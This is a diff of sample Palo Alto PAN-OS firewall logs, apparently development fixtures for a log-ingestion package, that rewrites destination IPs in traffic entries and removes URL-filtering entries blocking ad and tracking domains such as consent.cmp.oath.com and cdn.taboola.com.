+Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 
09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
-Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 
04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1
+Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log
index 2b6854cf5a5..2c3b2c1917b 100644
--- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log
+++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log
@@ -1,76 +1,76 @@
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 
16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:38 PA-220 1,2018/11/30 
16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 
16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:53 PA-220 1,2018/11/30 
16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
-Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
